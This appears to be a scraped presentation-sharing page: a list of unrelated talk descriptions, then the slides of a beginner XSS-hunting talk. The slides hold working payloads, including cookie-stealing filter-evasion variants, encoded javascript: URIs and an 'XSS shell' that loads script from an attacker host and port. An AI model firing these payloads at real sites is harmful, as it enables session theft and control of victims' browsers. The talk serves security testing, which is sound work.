This document provides an introduction to cross-site scripting (XSS) attacks over the course of one hour. It defines XSS and its different types (reflected, stored, DOM), discusses common injection points and payloads, and techniques for bypassing filters including encoding, evasion tricks, and tools. The goal is to teach novices the basics needed to find and exploit XSS vulnerabilities, with tips on contexts, detection, encoding, and actual attack vectors like cookie stealing.
Slide ini merupakan tutorial dasar dari penggunaan javaScript. Bagaimana javascript berjalan dan penggunaannya, javaScript statement, javaScript variable, javaScript looping, dan javaScript operator.
ReactJS Tutorial For Beginners | ReactJS Redux Training For Beginners | React...Edureka!
This Edureka ReactJS Tutorial For Beginners will help you in understanding the fundamentals of ReactJS and help you in building a strong foundation in React framework. Below are the topics covered in this tutorial:
1. Why ReactJS?
2. What Is ReactJS?
3. Advantages Of ReactJS
4. ReactJS Installation and Program
5. ReactJS Fundamentals
Node.js Tutorial for Beginners | Node.js Web Application Tutorial | Node.js T...Edureka!
This Edureka "Node.js tutorial" will help you to learn the Node.js fundamentals and how to create an application in Node.js. Node.js is an open-source, cross-platform JavaScript runtime environment for developing a diverse variety of server tools and applications. Below are the topics covered in this tutorial:
1) Client Server Architecture
2) Limitations of Multi-Threaded Model
3) What is Node.js?
4) Features of Node.js
5) Node.js Installation
6) Blocking Vs. Non – Blocking I/O
7) Creating Node.js Program
8) Node.js Modules
9) Demo – Grocery List Web Application using Node.js
The introduction of Project Lombok, a combination compile-time and development-time code generator, has made Java POJO verbosity history. Add Lombok to your daily coding practices, and you won't go back.
Slide ini merupakan tutorial dasar dari penggunaan javaScript. Bagaimana javascript berjalan dan penggunaannya, javaScript statement, javaScript variable, javaScript looping, dan javaScript operator.
ReactJS Tutorial For Beginners | ReactJS Redux Training For Beginners | React...Edureka!
This Edureka ReactJS Tutorial For Beginners will help you in understanding the fundamentals of ReactJS and help you in building a strong foundation in React framework. Below are the topics covered in this tutorial:
1. Why ReactJS?
2. What Is ReactJS?
3. Advantages Of ReactJS
4. ReactJS Installation and Program
5. ReactJS Fundamentals
Node.js Tutorial for Beginners | Node.js Web Application Tutorial | Node.js T...Edureka!
This Edureka "Node.js tutorial" will help you to learn the Node.js fundamentals and how to create an application in Node.js. Node.js is an open-source, cross-platform JavaScript runtime environment for developing a diverse variety of server tools and applications. Below are the topics covered in this tutorial:
1) Client Server Architecture
2) Limitations of Multi-Threaded Model
3) What is Node.js?
4) Features of Node.js
5) Node.js Installation
6) Blocking Vs. Non – Blocking I/O
7) Creating Node.js Program
8) Node.js Modules
9) Demo – Grocery List Web Application using Node.js
The introduction of Project Lombok, a combination compile-time and development-time code generator, has made Java POJO verbosity history. Add Lombok to your daily coding practices, and you won't go back.
Découvrez le framework web Spring Boot qui a la cote !
Apprenez comment son système d'auto-configuration fonctionne.
Live coding et exemple de migration vers Spring Boot sont de la partie.
This Edureka "Node.js Express tutorial" will help you to learn the Node.js express fundamentals with examples. Express.js is flexible and minimal node.js web application framework that provides robust set of features to develop mobile and web applications. It facilitates the rapid development of node.js applications. Below are the topics covered in this tutorial:
1) Why Express.js?
2) What is Express.js?
3) Express Installation
4) Express Routes
5) Express Middlewares
University of Colorado PhD software engineering student Aaron Schram explains the details of creating a web applications using the Spring MVC framework
JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. JWT is widely used technology specially for API's authentication. This PPT describes about security concerns with JWT..
Slides da palestra apresentada na BrazilJS Manaus. Nesta apresentação faço uma pequena comparativa entre arquiteturas de software para node usando Express e Node, e apresentando um pouco de como o Nest funciona.
The slides of my talk at PUGRoma.
Here, a complete sample code
https://github.com/leopro/trip-planner
Presentation is also here: http://t.co/5EK56yYBmQ
Detecting Security Vulnerabilities in Web Applications Using Dynamic Analysis...Andrew Petukhov
This talk was given at OWASP AppSec Europe 2008.
Full paper can be downloaded from here:
http://www.owasp.org/images/3/3e/OWASP-AppSecEU08-Petukhov.pdf
Découvrez le framework web Spring Boot qui a la cote !
Apprenez comment son système d'auto-configuration fonctionne.
Live coding et exemple de migration vers Spring Boot sont de la partie.
This Edureka "Node.js Express tutorial" will help you to learn the Node.js express fundamentals with examples. Express.js is flexible and minimal node.js web application framework that provides robust set of features to develop mobile and web applications. It facilitates the rapid development of node.js applications. Below are the topics covered in this tutorial:
1) Why Express.js?
2) What is Express.js?
3) Express Installation
4) Express Routes
5) Express Middlewares
University of Colorado PhD software engineering student Aaron Schram explains the details of creating a web applications using the Spring MVC framework
JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. JWT is widely used technology specially for API's authentication. This PPT describes about security concerns with JWT..
Slides da palestra apresentada na BrazilJS Manaus. Nesta apresentação faço uma pequena comparativa entre arquiteturas de software para node usando Express e Node, e apresentando um pouco de como o Nest funciona.
The slides of my talk at PUGRoma.
Here, a complete sample code
https://github.com/leopro/trip-planner
Presentation is also here: http://t.co/5EK56yYBmQ
Detecting Security Vulnerabilities in Web Applications Using Dynamic Analysis...Andrew Petukhov
This talk was given at OWASP AppSec Europe 2008.
Full paper can be downloaded from here:
http://www.owasp.org/images/3/3e/OWASP-AppSecEU08-Petukhov.pdf
Viruses on mobile platforms why we don't/don't we have viruses on android_Jimmy Shah
This presentation will discuss the resources available to attackers to write Android viruses, including methods of infecting executables, gaining control from the original app and avoiding detection.
Static Analysis Security Testing for Dummies... and YouKevin Fealey
Most enterprise application security teams have at least one Static Analysis Security Testing (SAST) tool in their tool-belt; but for many, the tool never leaves the belt. SAST tools have gotten a reputation for being slow, error-prone, and difficult to use; and out of the box, many of them are – but with a little more knowledge behind how these tools are designed, a SAST tool can be a valuable part of any security program.
In this talk, we’ll help you understand the strengths and weaknesses of SAST tools by illustrating how they trace your code for vulnerabilities. You’ll see out-of-the-box rules for commercial and open-source SAST tools, and learn how to write custom rules for the widely-used open source SAST tool, PMD. We’ll explain the value of customizing tools for your organization; and you’ll learn how to integrate SAST technologies into your existing build and deployment pipelines. Lastly, we’ll describe many of the common challenges organizations face when deploying a new security tool to security or development teams, as well as some helpful hints to resolve these issues
Ever Present Persistence - Established Footholds Seen in the WildCTruncer
This talk is about different attacker persistence techniques that we have seen in the wild, or published by other companies. We wanted to create a massive document containing all of these techniques with a mile wide, inch deep approach. Our goal is to give a description of how each technique works and a way to detect them to allow anyone to start looking for these specific techniques.
This talk goes over the art of antivirus evasion, or really the lack thereof. I talk about a new module that's getting added into Veil-Evasion, a signature that was developed for Veil, and creating your own processes for approaching unknowns.
In the following slides we will show you how to create a #DMZ using the #FortiGate
#Firewall. See next chapters on #FortiGate configuration. Stay with us!
Cross site scripting (XSS) is a type of computer security vulnerability typically found in web applications, but in proposing defensive measures for cross site scripting the websites validate the user input and determine if they are vulnerable to cross site scripting. The major considerations are input validation and output sanitization.
There are lots of defense techniques introduced nowadays and even though the coding methods used by developers are evolving to counter attack cross site scripting techniques, still the security threat persist in many web applications for the following reasons:
• The complexity of implementing the codes or methods.
• Non-existence of input data validation and output sanitization in all input fields of the application.
• Lack of knowledge in identifying hidden XSS issues etc.
This proposed project report will briefly discuss what cross site scripting is and highlight the security features and defense techniques that can help against this widely versatile attack.
Myself and Asanka Fernandopulle conducted corporate level workshop on Application Security. This workshop covered areas such as application security treats, secure cording practices, application penetration testing and web application exploitations. Workshop mainly consisted with practical sessions and demonstrations. You can find all the presentations here.
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
Contents :
- Introduction
- Description as A Widely Used Hacking Technique
- How it is used in Hacking
- What can be done with XSS
#XSS, #Hacking, #Security, #CookieStealing, #InternetBug, #HTMLInjection
Sincerely,
Irfad Imtiaz
This presentation is from Null/OWASP/G4H November Bangalore MeetUp 2014.
technology.inmobi.com/events/null-owasp-g4h-november-meetup
Talk Outline:-
A) Reflective-(Non-Persistent Cross-site Scripting)
- What is Reflective Cross-site scripting.
- Testing for Reflected Cross site scripting
How to Test
- Black Box testing
- Bypass XSS filters
- Gray Box testing
Tools
Defending Against Reflective Cross-site scripting.
Examples of Reflective Cross-Site Scripting Attacks.
B) Stored -(Persistent Cross-site Scripting)
What is Stored Cross-site scripting.
How to Test
- Black Box testing
- Gray Box testing
Tools
Defending Against Stored Cross-site scripting.
Examples of Stored Cross-Site Scripting Attacks.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Welocme to ViralQR, your best QR code generator.ViralQR
Welcome to ViralQR, your best QR code generator available on the market!
At ViralQR, we design static and dynamic QR codes. Our mission is to make business operations easier and customer engagement more powerful through the use of QR technology. Be it a small-scale business or a huge enterprise, our easy-to-use platform provides multiple choices that can be tailored according to your company's branding and marketing strategies.
Our Vision
We are here to make the process of creating QR codes easy and smooth, thus enhancing customer interaction and making business more fluid. We very strongly believe in the ability of QR codes to change the world for businesses in their interaction with customers and are set on making that technology accessible and usable far and wide.
Our Achievements
Ever since its inception, we have successfully served many clients by offering QR codes in their marketing, service delivery, and collection of feedback across various industries. Our platform has been recognized for its ease of use and amazing features, which helped a business to make QR codes.
Our Services
At ViralQR, here is a comprehensive suite of services that caters to your very needs:
Static QR Codes: Create free static QR codes. These QR codes are able to store significant information such as URLs, vCards, plain text, emails and SMS, Wi-Fi credentials, and Bitcoin addresses.
Dynamic QR codes: These also have all the advanced features but are subscription-based. They can directly link to PDF files, images, micro-landing pages, social accounts, review forms, business pages, and applications. In addition, they can be branded with CTAs, frames, patterns, colors, and logos to enhance your branding.
Pricing and Packages
Additionally, there is a 14-day free offer to ViralQR, which is an exceptional opportunity for new users to take a feel of this platform. One can easily subscribe from there and experience the full dynamic of using QR codes. The subscription plans are not only meant for business; they are priced very flexibly so that literally every business could afford to benefit from our service.
Why choose us?
ViralQR will provide services for marketing, advertising, catering, retail, and the like. The QR codes can be posted on fliers, packaging, merchandise, and banners, as well as to substitute for cash and cards in a restaurant or coffee shop. With QR codes integrated into your business, improve customer engagement and streamline operations.
Comprehensive Analytics
Subscribers of ViralQR receive detailed analytics and tracking tools in light of having a view of the core values of QR code performance. Our analytics dashboard shows aggregate views and unique views, as well as detailed information about each impression, including time, device, browser, and estimated location by city and country.
So, thank you for choosing ViralQR; we have an offer of nothing but the best in terms of QR code services to meet business diversity!
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™UiPathCommunity
In questo evento online gratuito, organizzato dalla Community Italiana di UiPath, potrai esplorare le nuove funzionalità di Autopilot, il tool che integra l'Intelligenza Artificiale nei processi di sviluppo e utilizzo delle Automazioni.
📕 Vedremo insieme alcuni esempi dell'utilizzo di Autopilot in diversi tool della Suite UiPath:
Autopilot per Studio Web
Autopilot per Studio
Autopilot per Apps
Clipboard AI
GenAI applicata alla Document Understanding
👨🏫👨💻 Speakers:
Stefano Negro, UiPath MVPx3, RPA Tech Lead @ BSP Consultant
Flavio Martinelli, UiPath MVP 2023, Technical Account Manager @UiPath
Andrei Tasca, RPA Solutions Team Lead @NTT Data
2. Who and Why
•
Student & Junior Security Consultant.
•
XSS is a easy win if you do it correctly.
•
Bug bounties pay well and clients give you respect.
•
Cross site scripting is one of the oldest web application
attacks known and is to be dated around 1996-1998
3. What is XSS?
Untrusted data from user is processed by the
application without any sort of validation.
It affects client side but the vulnerability resides in the
server side.
Different types Reflected, Stored and DOM XSS
5. Reflected XSS
What is wrong with the above code?
The above code just prints the comment which is
retrieved from the $_GET variable.
Can add malicious JavaScript with the original URL.
<?php
echo '<h1>Hello ' . $_GET["name"]. '</h1>';
6. Some Beginner Tips
XSS can come from anywhere. Some common ones are
URL parameter
Headers i.e user agent
Metadata
Input forms
Text area
Hidden fields
Flash parameters
File Uploads
7. Some Beginner Tips
1. Try injection HTML Tags as well and malicious JavaScript
2. SVG is always good for a short and crisp attack vector. Can
add whitespaces forward slashes and unclosed tags.
3. Add junk data with your payload
4. Always try a couple of different payloads. This mainly
applies when trying to evade filters.
"><svg/onload=prompt(1)>
8. Stored XSS
Malicious payload is stored by the server though database
or other forms of storage and is reflected back.
This form of attack is easier than phishing with XSS
payloads.
Can get admin cookies as well access to the internal
network depending on the attack vector.
9. DOM XSS
The document object model is a structured representation of
the web page rendered by the browser.
DOM is where event handlers and any other JavaScript
functions execute. DOM shows all the JavaScript and HTML
rendered by your browser.
DOM defines a way a webpage accessed and manipulated.
An attacker can manipulate the DOM by adding malicious
JavaScript which can change elements set by the DOM to
attack a victim.
10. DOM XSS
To find DOM XSS, analyse the JavaScript being executed on
the page and see if DOM being written.
DOM is not view source. Inspect element is a better visual
representation of the DOM.
ZAP,Burp and other proxies does pick up unsafe methods
but you will need to check manually.
If it cannot be exploitable, try figuring about what library
and unsafe sink the application is using. E.g. jquery .attr()
11. DOM XSS
Common methods used to access DOM
document.location
document.URL
document.URLUnencoded
document.referrer
window.location
Passed data can then be written by methods such as eval,
document.write and window.setinterval.
12. Useful sources
OWASP DOM XSS prevention cheat – gives you good
explanation on unsafe methods that directly modify DOM.
The DOM XSS wiki
:https://code.google.com/p/domxsswiki/wiki/Introduction
The wiki has useful information on dangerous methods,
common sources and sinks.
Other variations include Mutation XSS. More on that later…..
13. Context is Everything
Context is where the given input is reflected back.
Five common ones
1. HTML
2. Attributes
3. Script
4. URL
5. Style
14. HTML Context
Malicious input in reflected back in the html body in tags
such as <div><p><title> and more.
Easiest to attack
Close the tag and try <script>alert(1)</script> or any similar
payload.
15. Attribute Context
HTML elements can have attributes. Attributes are
Input is reflected in a attribute element. So look for input
being reflected back in ‘value =‘ or ‘alt =‘ or something
similar.
Most of the time, attributes will be inside a single or a
double quote.
16. Couple of tips
1. Break out of the context by closing the quote and attribute
tag. E.g ‘>
2. Any type of encoding won’t help your payload if you can’t
break out of context.
3. If in doubt, URL-encode any special characters that
have signify & = + ; and space. aas' onload='prompt(0);''
4. Event handlers can also be used to attack attributes aas'
onload='prompt(0);''
17. Script Context
The input will be reflected back inside a script tag. break out
of text with quotes and execute
Input is usually reflected back as part of a variable.
Payload example
junk' ; alert(1);//
18. URL Context
The input is reflected back in a href attribute. E.g.
<iframe src=“[Reflected Data]”>
<a href==“[Reflected Data]”>Link</a>
<META http-equiv=“refresh” content=““[Reflected Data]”>
No need to break out of context. Only need to encode
payloads. This type of context requires the victim to click
the URL to execute.
19. Tips
Common ways to attack URL Context
The above payload is base64 encoded. More about encoding
later.
You can also define the charset just like data, this might be
useful in some cases.
javascript:prompt(0)
data/text/html;base64, PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
20. CSS Context
Also know as style context
Input is usually reflected in inside a style tag
Can be attacked using
Another common one
width:expression(alert(‘XSS’))
21. WAF Detection
Usually Regex, Blacklist or whitelist based
WAF can sometimes detect inbound as well as outbound.
Most WAFs still detect using a signature based approach.
Common way to detect WAFs: Modified cookies, rewritten
headers and response codes
22. WAF Detection
Find combinations of allowed and block characters first.
Some known tools to detect WAF.
•
Wafw00f
•
http-waf-fingerprint NSE script
•
http-waf-detect NSE script
Will only detect the popular ones.
xss,<>{};”’script
23. Filter Evasion 101
More than one ways to skin a web app!
If <script> tag is blocked>
If site is filtering double and single quotes, you can use back
tick (`). This technique only works on IE.
“><script >alert(document.cookie)</script >
“><ScRiPt>alert(document.cookie)</ScRiPt>
“%3e%3cscript%3ealert(document.cookie)
%3c/script%3e
“><scr<script>ipt>alert(document.cookie)</scr</s
cript>ipt>
%00“><script>alert(document.cookie)</script>
24. Filter Evasion
Some popular techniques consists of spaces, encoding and
comments. Try using prompt or confirm instead of alert
Calling a external JavaScript file from inside a script source tag
if brackets and quotes are blocked.
If the application is filtering quotes or blocking script tags, try
the below
<SCRIPT
SRC=https://web.archive.org/web/20150121175718/http://ha.cker
s.org/xss.js></SCRIPT>
<img/src=x onerror=prompt(/XSS/);>
25. Filter Evasion
When in doubt, try to comment everything after your
payload.
If less than and greater than sign is filtered in attribute
context, try
If script and src tags are blocked in a html context, try
<script>alert(1)</script><!-- (html/attribute context)
“;alert(5);// (script context)
“ onload=“prompt(0);””
<object data=“javascript:alert(0)”>
26. Filter Evasion resources
Too many techniques to present. Check them out here
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat
_Sheet
http://codev587.net/xss-filter-evasion-cheat-sheet-no1.html
http://n0p.net/penguicon/php_app_sec/mirror/xss.html
27. Encoding
Encoding – transferring data from one format to another. E.g.
ASCII, Unicode, URL Encoding etc
Browsers support numerous encoding schemes but the attack
vector depends on the page and its meta tag e.g.
Encoding is useful if the server is decoding correctly. Still need
to break out of context correctly for the encoded payload to
work.
<svg/onload=alert()>>
28. Encoding
The following table describes how a user can obfuscate an IP
address:
This trick is getting more common among phishers. E.g.
http://0xd2.0xdb.0xf1.0x7b/.online/BankofAmericaOnlineID/
SignIn
URL Form
http://127.0.0.1/ Decimal
http://2130706433/ Dword
http://0x7f.0x00.0x00.0x01/ Hex
http://0177.0000.0000.0001/ Octal
http://127.0x00.0000.0x01/ Mixed
29. Encoding
fromCharCode() method converts Unicode values into
characters
Long UTF-8 Unicode encoding to bypass filters
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<img src=x
onerror="java
15cript�
000058alert
('XSS�
0039)">
30. Encoding
Encoding can also be useful to break up an XSS payload if the
server is using pattern matching regex.
Can also double encode payloads. Depends on how the
application processes encoded client requests.
The hexadecimal encoding of “../” represents "%2E%2E%2f“
Double encoding of “../” represents "%252E%252E%252F"
<IMG SRC="jav	ascript:alert('XSS');">
31. More Filter Evasion
ASCII Decimal Encoded
Will turn into alert(‘XSS’). The payload uses html entities
which is decoded and rendered by the browser.
ASCII Hex Encoded
Useful for bypassing ‘magic_quotes_gpc’
javascr
ipt:alert
('XSS')
javascrip
;t:alert(
7;XSS')
34. Useful tools
Opinion: Most scanners suck at finding XSS.
Couple of tools I like – Xenotix, XSSValidator Burp Plugin,
Sleepy puppy (If testing multiple applications, has trackable
XSS payloads)
How to build a scanner that works?
A - Scanning within a browser engine.
B - Using PhantonJS or similar webkit detect successful
reflected XSS.
I still prefer finding XSS manually but I like having options
35. XSS Shell Demo
Cool POC by Brutelogic. Fun way to report XSS than just
script alert(1).
Attacker machine listener
Target payload
<svg/onload=setInterval(function()
{d=document;z=d.createElement("script");z.src="//HOST:PORT";d.
body.appendChild(z)},0)>
36. Things I didn’t mention
Flash XSS – Embedded SWF files can be decompiled to source
code. This can be used to find unfiltered variables which can
be called from an URL to include malicious XSS.
XSS Polyglot – Upload a flash file and be accepted as vaild
JavaScript. Run remote XSS with src tag. (can be beat CSP in
rare cases)
Mutation XSS – There are more ways to trick DOM into
parsing malicious XHTML like payloads.
All worth checking out…..